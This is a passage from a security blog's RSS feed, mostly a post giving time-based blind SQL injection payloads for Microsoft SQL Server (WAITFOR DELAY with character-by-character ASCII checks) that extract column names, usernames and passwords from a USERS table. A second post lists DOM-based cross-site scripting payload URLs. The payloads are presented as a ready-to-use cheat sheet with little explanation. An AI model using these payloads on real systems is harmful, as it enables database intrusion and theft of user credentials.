<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (LEN(</span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">SELECT TOP 1 column_name from </span><span style="color:#a8a8a8;">PRO-DB-1</span><span style="color:#fdb910;">.information_schema.columns where table_name=&#8217;</span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">&#8216; and </span><span style="color:#ff3300;">column_name</span><span style="color:#fdb910;">&gt;</span><span style="color:#ff3300;">,</span><span style="color:#fdb910;">&#8216;</span></span><span style="color:#a8a8a8;font-family:Tahoma;font-size:xx-small;">PASS</span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;">&#8216;</span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">)</span><span style="color:#ff3300;">=2</span><span style="color:#fdb910;">) WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((</span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">SELECT TOP 1 column_name from </span><span style="color:#a8a8a8;">PRO-DB-1</span><span style="color:#fdb910;">.information_schema.columns where table_name=&#8217;</span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">&#8216; and </span><span style="color:#ff3300;">column_name</span><span style="color:#fdb910;">&gt;</span><span style="color:#fdb910;">&#8216;</span></span><span style="color:#a8a8a8;font-family:Tahoma;font-size:xx-small;">PASS</span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;">&#8216;</span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">1</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=105</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds) </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((</span></span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">SELECT TOP 1 column_name from </span><span style="color:#a8a8a8;">PRO-DB-1</span><span style="color:#fdb910;">.information_schema.columns where table_name=&#8217;</span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">&#8216; and </span><span style="color:#ff3300;">column_name</span><span style="color:#fdb910;">&gt;</span><span style="color:#fdb910;">&#8216;</span></span><span style="color:#a8a8a8;font-family:Tahoma;font-size:xx-small;">PASS</span><span style="color:#fdb910;font-family:Tahoma;font-size:xx-small;">&#8216;</span><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#fdb910;">),</span><span style="color:#ff3300;">2</span><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=100</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;">Column Name = ID</span></strong></p>
<p>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">BLIND SQL INJECTION &#8211; EXTRACT 1st FIELD OF 1st ROW</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"><span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (LEN(SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USER</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">)</span><span style="color:#ff3300;">=</span><strong><span style="color:#ff3300;">5</span></strong><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USER</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">1</span></strong><span style="color:#fdb910;">,1))</span><span style="color:#ff3300;">=97</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;"> </span></strong><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USER</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">2</span></strong><span style="color:#fdb910;">,1))</span><span style="color:#ff3300;">=100</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;"> </span></strong><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USER</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">3</span></strong><span style="color:#fdb910;">,1))</span><span style="color:#ff3300;">=109</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211;</span>  (+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;"> </span></strong><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USER</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">4</span></strong><span style="color:#fdb910;">,1))</span><span style="color:#ff3300;">=105</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;"> </span></strong><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USER</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">5</span></strong><span style="color:#fdb910;">,1))</span><span style="color:#ff3300;">=110</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211;</span>  (+10 seconds)</span><strong></strong><strong><span style="font-family:Tahoma;font-size:xx-small;">Field Data = ADMIN</span></strong></p>
<p>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">BLIND SQL INJECTION &#8211; EXTRACT 2nd FIELD OF 1st ROW</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"><span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (LEN(SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">PASS</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">)</span><span style="color:#ff3300;">=<strong>3</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">PASS </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">1</span></strong><span style="color:#fdb910;">,1))</span><span style="color:#ff3300;">=49</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;"> </span></strong><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">PASS </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">2</span></strong><span style="color:#fdb910;">,1))</span><span style="color:#ff3300;">=50</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;"> </span></strong><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">PASS </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">3</span></strong><span style="color:#fdb910;">,1))</span><span style="color:#ff3300;">=51</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211;</span>  (+10 seconds)</span><strong></strong><strong><span style="font-family:Tahoma;font-size:xx-small;">Field Data = 123</span></strong></p>
<p>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">BLIND SQL INJECTION &#8211; EXTRACT 3nd FIELD OF 1st ROW</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"><span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (LEN(SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">ID </span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">)</span><span style="color:#ff3300;">=<strong>3</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">ID </span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">1</span></strong><span style="color:#fdb910;">,1))</span><span style="color:#ff3300;">=49</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;"> </span></strong><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">ID </span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">2</span></strong><span style="color:#fdb910;">,1))</span><span style="color:#ff3300;">=48</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;"> </span></strong><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">ID </span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">3</span></strong><span style="color:#fdb910;">,1))</span><span style="color:#ff3300;">=48</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211;</span>  (+10 seconds)</span><strong></strong><strong><span style="font-family:Tahoma;font-size:xx-small;">Field Data = 100</span></strong></p>
<p>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">BLIND SQL INJECTION &#8211; EXTRACT 1st FIELD OF 2nd ROW</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (LEN(SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USER</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;"> where </span><span style="color:#a8a8a8;">USER</span><span style="color:#fdb910;"> NOT in (&#8216;</span><span style="color:#a8a8a8;">ADMIN</span><span style="color:#fdb910;">&#8216;) order by</span><span style="color:#a8a8a8;"> USERS </span><span style="color:#fdb910;">desc)</span><span style="color:#ff3300;">=<strong>3</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USER</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;"> where </span><span style="color:#a8a8a8;">USER</span><span style="color:#fdb910;"> NOT in (&#8216;</span><span style="color:#a8a8a8;">ADMIN</span><span style="color:#fdb910;">&#8216;) order by</span><span style="color:#a8a8a8;"> USER </span><span style="color:#fdb910;">desc),</span><strong><span style="color:#ff3300;">1</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=106</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211;  </span>(+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;"> </span></strong><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USER</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;"> where </span><span style="color:#a8a8a8;">USER</span><span style="color:#fdb910;"> NOT in (&#8216;</span><span style="color:#a8a8a8;">ADMIN</span><span style="color:#fdb910;">&#8216;) order by</span><span style="color:#a8a8a8;"> USER </span><span style="color:#fdb910;">desc),</span><strong><span style="color:#ff3300;">2</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=111</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211;</span>  (+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;"> </span></strong><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USER</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;"> where </span><span style="color:#a8a8a8;">USER</span><span style="color:#fdb910;"> NOT in (&#8216;</span><span style="color:#a8a8a8;">ADMIN</span><span style="color:#fdb910;">&#8216;) order by</span><span style="color:#a8a8a8;"> USER </span><span style="color:#fdb910;">desc),</span><strong><span style="color:#ff3300;">3</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=101</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)</span><strong></strong><strong><span style="font-family:Tahoma;font-size:xx-small;">Field Data = JOE</span></strong></p>
<p>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">BLIND SQL INJECTION &#8211; EXTRACT 1st FIELD OF 3nd ROW</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (LEN(SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USER</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;"> where </span><span style="color:#a8a8a8;">USER</span><span style="color:#fdb910;"> NOT in (&#8216;</span><span style="color:#a8a8a8;">JOE</span><span style="color:#fdb910;">&#8216;) order by</span><span style="color:#a8a8a8;"> USERS </span><span style="color:#fdb910;">desc)</span><span style="color:#ff3300;">=<strong>3</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USER</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;"> where </span><span style="color:#a8a8a8;">USER</span><span style="color:#fdb910;"> NOT in (&#8216;</span><span style="color:#a8a8a8;">JOE</span><span style="color:#fdb910;">&#8216;) order by</span><span style="color:#a8a8a8;"> USER </span><span style="color:#fdb910;">desc),</span><strong><span style="color:#ff3300;">1</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=106</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211;  </span>(+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;"> </span></strong><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USER</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;"> where </span><span style="color:#a8a8a8;">USER</span><span style="color:#fdb910;"> NOT in (&#8216;</span><span style="color:#a8a8a8;">JOE</span><span style="color:#fdb910;">&#8216;) order by</span><span style="color:#a8a8a8;"> USER </span><span style="color:#fdb910;">desc),</span><strong><span style="color:#ff3300;">2</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=105</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211;</span>  (+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;"> </span></strong><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (ASCII(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USER</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">USERS</span><span style="color:#fdb910;"> where </span><span style="color:#a8a8a8;">USER</span><span style="color:#fdb910;"> NOT in (&#8216;</span><span style="color:#a8a8a8;">JOE</span><span style="color:#fdb910;">&#8216;) order by</span><span style="color:#a8a8a8;"> USER </span><span style="color:#fdb910;">desc),</span><strong><span style="color:#ff3300;">3</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=109</span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)</span><strong></strong><strong><span style="font-family:Tahoma;font-size:xx-small;">Field Data = JIM</span></strong></td>
</tr>
</tbody>
</table>
</div>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/andiwijaya.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/andiwijaya.wordpress.com/196/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/andiwijaya.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/andiwijaya.wordpress.com/196/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/andiwijaya.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/andiwijaya.wordpress.com/196/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/andiwijaya.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/andiwijaya.wordpress.com/196/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/andiwijaya.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/andiwijaya.wordpress.com/196/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/andiwijaya.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/andiwijaya.wordpress.com/196/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/andiwijaya.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/andiwijaya.wordpress.com/196/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=andiwijaya.wordpress.com&amp;blog=836339&amp;post=196&amp;subd=andiwijaya&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://andiwijaya.wordpress.com/2011/12/31/microsoft-sql-blind-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0a4646472c465eeb00190a40d7a185ae?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">Andi</media:title>
		</media:content>
	</item>
		<item>
		<title>DOM Based Cross Site Scripting</title>
		<link>http://andiwijaya.wordpress.com/2011/12/31/dom-based-cross-site-scripting/</link>
		<comments>http://andiwijaya.wordpress.com/2011/12/31/dom-based-cross-site-scripting/#comments</comments>
		<pubDate>Fri, 30 Dec 2011 17:31:41 +0000</pubDate>
		<dc:creator>Andi Wijaya</dc:creator>
				<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://andiwijaya.wordpress.com/?p=193</guid>
		<description><![CDATA[DOM XSS Example 1: http://evilsql.com/main/page5.php?&#60;script&#62;alert(&#8216;XSS&#8217;)&#60;/script&#62;  DOM XSS Example 2: http://evilsql.com/main/page5.php?name=&#60;script&#62;alert(&#8216;XSS&#8217;)&#60;/script&#62;  DOM XSS Example 3: http://evilsql.com/main/page5.php?#&#60;script&#62;alert(&#8216;XSS&#8217;)&#60;/script&#62;  DOM XSS Example 4: http://nobody@evilsql.com/main/page5.php?&#60;script&#62;alert(&#8216;XSS&#8217;)&#60;/script&#62;  DOM Echo: http://www.evilsql.com/main/page5.php<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=andiwijaya.wordpress.com&amp;blog=836339&amp;post=193&amp;subd=andiwijaya&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><span style="color:#fdb910;font-family:Arial;font-size:xx-small;">DOM XSS Example 1:<br />
<a href="http://evilsql.com/main/page5.php?%3Cscript%3Ealert('XSS')%3C/script%3E">http://evilsql.com/main/page5.php?&lt;script&gt;alert(&#8216;XSS&#8217;)&lt;/script&gt;</a> </span></p>
<p><span style="color:#fdb910;font-family:Arial;font-size:xx-small;">DOM XSS Example 2:<br />
<a href="http://evilsql.com/main/page5.php?name=%3Cscript%3Ealert('XSS')%3C/script%3E">http://evilsql.com/main/page5.php?name=&lt;script&gt;alert(&#8216;XSS&#8217;)&lt;/script&gt;</a> </span></p>
<p><span style="color:#fdb910;font-family:Arial;font-size:xx-small;">DOM XSS Example 3:<br />
<a href="http://evilsql.com/main/page5.php?#&lt;script&gt;alert('XSS')&lt;/script&gt;">http://evilsql.com/main/page5.php?#&lt;script&gt;alert(&#8216;XSS&#8217;)&lt;/script&gt;</a> </span></p>
<p><span style="color:#fdb910;font-family:Arial;font-size:xx-small;">DOM XSS Example 4:<br />
<a href="http://nobody@evilsql.com/main/page5.php?%3Cscript%3Ealert('XSS')%3C/script%3E">http://nobody@evilsql.com/main/page5.php?&lt;script&gt;alert(&#8216;XSS&#8217;)&lt;/script&gt;</a> </span></p>
<p><span style="font-family:Arial;font-size:xx-small;"><strong>DOM Echo:</p>
<p>http://www.evilsql.com/main/page5.php</strong></span></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/andiwijaya.wordpress.com/193/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/andiwijaya.wordpress.com/193/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/andiwijaya.wordpress.com/193/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/andiwijaya.wordpress.com/193/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/andiwijaya.wordpress.com/193/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/andiwijaya.wordpress.com/193/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/andiwijaya.wordpress.com/193/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/andiwijaya.wordpress.com/193/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/andiwijaya.wordpress.com/193/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/andiwijaya.wordpress.com/193/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/andiwijaya.wordpress.com/193/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/andiwijaya.wordpress.com/193/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/andiwijaya.wordpress.com/193/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/andiwijaya.wordpress.com/193/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=andiwijaya.wordpress.com&amp;blog=836339&amp;post=193&amp;subd=andiwijaya&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://andiwijaya.wordpress.com/2011/12/31/dom-based-cross-site-scripting/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0a4646472c465eeb00190a40d7a185ae?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">Andi</media:title>
		</media:content>
	</item>
		<item>
		<title>Microsoft SQL Union Exploit</title>
